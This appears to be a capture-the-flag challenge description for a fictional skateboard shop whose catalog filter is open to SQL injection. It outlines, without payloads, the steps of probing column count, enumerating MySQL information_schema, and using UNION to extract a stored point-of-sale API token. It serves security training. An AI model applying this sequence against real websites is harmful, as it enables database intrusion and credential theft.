Stockroom
Coast & Decks built their catalog filter in 2011 and never revisited it. The point-of-sale credentials sit in the same database.
The Scenario
Coast & Decks opened in Long Beach in 2011 with the shop website built
by a friend of the owner's brother — a weekend job to get the deck
catalog online before that season's first big restock. The catalog
filter was wired up that same weekend. The point-of-sale integration
needed somewhere to keep its rotating credentials; "the database" was
the only database the team owned, so that's where they went, alongside
the boards and the trucks and the wax.
Challenge Intel
Synopsis
Coast & Decks' shape filter is concatenated. Use MySQL information_schema to enumerate tables and columns, then pivot a UNION to read a vault_codes row containing the point-of-sale API token.
What It Is
Coast & Decks runs a small online skateboard catalog. The /decks endpoint filters by board shape via a URL parameter; the parameter is spliced directly into an 8-column SELECT. The vault_codes table — used by the point-of-sale system to store rotating credentials — sits in the same database. The teaching focus here is the MySQL information_schema enumeration sequence: list tables with information_schema.tables, list columns with information_schema.columns, then pivot the UNION to extract from the target table.
Who It's For
Players who know the UNION pattern and need practice with MySQL information_schema enumeration (vs sqlite_master).
Skills You'll Practice
- Identifying MySQL backend via error syntax
- ORDER BY column-count probing
- information_schema.tables enumeration (WHERE table_schema=DATABASE())
- information_schema.columns enumeration
- Cross-table UNION extraction
What You'll Gain
- MySQL metadata-enumeration muscle memory
- Comfort with the table→column→data progression